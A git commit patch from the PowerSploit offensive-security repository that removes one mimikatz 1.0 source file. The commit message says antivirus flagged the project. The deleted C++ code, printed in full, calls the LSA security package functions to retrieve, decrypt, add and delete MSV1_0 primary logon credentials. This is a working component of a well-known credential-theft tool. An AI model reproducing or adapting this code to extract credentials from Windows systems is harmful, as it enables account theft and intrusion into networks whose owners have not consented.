From c5168cdba6a3b2d7dd8d79c8ac9583d3ace6a504 Mon Sep 17 00:00:00 2001 From: mattifestation Date: Mon, 3 Feb 2014 17:13:35 -0500 Subject: Removed mimikatz. This doesn't need to reside in PowerSploit. Those that are truly paranoid should validate that the embedded executable in Invoke-Mimikatz.ps1 is indeed mimikatz. This was causing AV to flag upon downloading PowerSploit. --- .../sekurlsa/Security Packages/msv1_0_helper.cpp | 53 ---------------------- 1 file changed, 53 deletions(-) delete mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.cpp (limited to 'Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.cpp') diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.cpp deleted file mode 100644 index 7ccb8e5..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.cpp +++ /dev/null @@ -1,53 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "msv1_0_helper.h" -DWORD MSV1_0_MspAuthenticationPackageId = 0; - -void NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, bool relative) -{ - if(String->Buffer) - String->Buffer = reinterpret_cast(reinterpret_cast(String->Buffer) + ((relative ? -1 : 1) * reinterpret_cast(BaseAddress))); -} - -NTSTATUS NlpAddPrimaryCredential(PLUID LogonId, PMSV1_0_PRIMARY_CREDENTIAL Credential, unsigned short CredentialSize) -{ - STRING PrimaryKeyValue, CredentialString; - mod_text::RtlInitString(&PrimaryKeyValue, MSV1_0_PRIMARY_KEY); - - NlpMakeRelativeOrAbsoluteString(Credential, &Credential->UserName); - NlpMakeRelativeOrAbsoluteString(Credential, &Credential->LogonDomainName); - CredentialString.Buffer = reinterpret_cast(Credential); - CredentialString.MaximumLength = CredentialString.Length = CredentialSize; - SeckPkgFunctionTable->LsaProtectMemory(CredentialString.Buffer, CredentialString.Length); - return SeckPkgFunctionTable->AddCredential(LogonId, MSV1_0_MspAuthenticationPackageId, &PrimaryKeyValue, &CredentialString ); -} - -NTSTATUS NlpGetPrimaryCredential(PLUID LogonId, PMSV1_0_PRIMARY_CREDENTIAL *Credential, unsigned short *CredentialSize) -{ - ULONG QueryContext = 0, PrimaryKeyLength; - STRING PrimaryKeyValue, CredentialString; - mod_text::RtlInitString(&PrimaryKeyValue, MSV1_0_PRIMARY_KEY); - - NTSTATUS retour = SeckPkgFunctionTable->GetCredentials(LogonId, MSV1_0_MspAuthenticationPackageId, &QueryContext, FALSE, &PrimaryKeyValue, &PrimaryKeyLength, &CredentialString); - if(NT_SUCCESS(retour)) - { - SeckPkgFunctionTable->LsaUnprotectMemory(CredentialString.Buffer, CredentialString.Length); - *Credential = (PMSV1_0_PRIMARY_CREDENTIAL) CredentialString.Buffer; - NlpMakeRelativeOrAbsoluteString(*Credential, &((*Credential)->UserName), false); - NlpMakeRelativeOrAbsoluteString(*Credential, &((*Credential)->LogonDomainName), false); - if (CredentialSize) - *CredentialSize = CredentialString.Length; - } - return retour; -} - -NTSTATUS NlpDeletePrimaryCredential(PLUID LogonId) -{ - STRING PrimaryKeyValue; - mod_text::RtlInitString(&PrimaryKeyValue, MSV1_0_PRIMARY_KEY); - return SeckPkgFunctionTable->DeleteCredential(LogonId, MSV1_0_MspAuthenticationPackageId, &PrimaryKeyValue); -} \ No newline at end of file -- cgit v1.2.3